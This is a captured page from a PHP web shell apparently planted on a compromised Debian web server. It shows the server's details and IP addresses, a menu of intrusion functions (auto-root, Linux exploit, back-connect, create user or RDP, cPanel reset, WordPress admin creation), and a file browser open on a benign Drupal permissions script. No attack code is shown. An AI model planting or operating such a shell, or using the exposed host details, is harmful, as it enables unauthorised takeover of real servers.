Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.226.187.60
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
user /
[ HOME SHELL ]
Name
Size
Permission
Action
tests
[ DIR ]
drwxr-xr-x
user-picture.tpl.php
595
B
-rw-r--r--
user-profile-category.tpl.php
1001
B
-rw-r--r--
user-profile-item.tpl.php
918
B
-rw-r--r--
user-profile.tpl.php
1.65
KB
-rw-r--r--
user-rtl.css
510
B
-rw-r--r--
user.admin.inc
38.52
KB
-rw-r--r--
user.api.php
14.79
KB
-rw-r--r--
user.css
1.78
KB
-rw-r--r--
user.info
366
B
-rw-r--r--
user.install
28.94
KB
-rw-r--r--
user.js
6.41
KB
-rw-r--r--
user.module
140.39
KB
-rw-r--r--
user.pages.inc
21.56
KB
-rw-r--r--
user.permissions.js
2.66
KB
-rw-r--r--
user.test
101.92
KB
-rw-r--r--
user.tokens.inc
4
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : user.permissions.js
(function ($) { /** * Shows checked and disabled checkboxes for inherited permissions. */ Drupal.behaviors.permissions = { attach: function (context) { var self = this; $('table#permissions').once('permissions', function () { // On a site with many roles and permissions, this behavior initially has // to perform thousands of DOM manipulations to inject checkboxes and hide // them. By detaching the table from the DOM, all operations can be // performed without triggering internal layout and re-rendering processes // in the browser. var $table = $(this); if ($table.prev().length) { var $ancestor = $table.prev(), method = 'after'; } else { var $ancestor = $table.parent(), method = 'append'; } $table.detach(); // Create dummy checkboxes. We use dummy checkboxes instead of reusing // the existing checkboxes here because new checkboxes don't alter the // submitted form. If we'd automatically check existing checkboxes, the // permission table would be polluted with redundant entries. This // is deliberate, but desirable when we automatically check them. var $dummy = $('<input type="checkbox" class="dummy-checkbox" disabled="disabled" checked="checked" />') .attr('title', Drupal.t("This permission is inherited from the authenticated user role.")) .hide(); $('input[type=checkbox]', this).not('.rid-2, .rid-1').addClass('real-checkbox').each(function () { $dummy.clone().insertAfter(this); }); // Initialize the authenticated user checkbox. $('input[type=checkbox].rid-2', this) .bind('click.permissions', self.toggle) // .triggerHandler() cannot be used here, as it only affects the first // element. .each(self.toggle); // Re-insert the table into the DOM. $ancestor[method]($table); }); }, /** * Toggles all dummy checkboxes based on the checkboxes' state. * * If the "authenticated user" checkbox is checked, the checked and disabled * checkboxes are shown, the real checkboxes otherwise. */ toggle: function () { var authCheckbox = this, $row = $(this).closest('tr'); // jQuery performs too many layout calculations for .hide() and .show(), // leading to a major page rendering lag on sites with many roles and // permissions. Therefore, we toggle visibility directly. $row.find('.real-checkbox').each(function () { this.style.display = (authCheckbox.checked ? 'none' : ''); }); $row.find('.dummy-checkbox').each(function () { this.style.display = (authCheckbox.checked ? '' : 'none'); }); } }; })(jQuery);
Close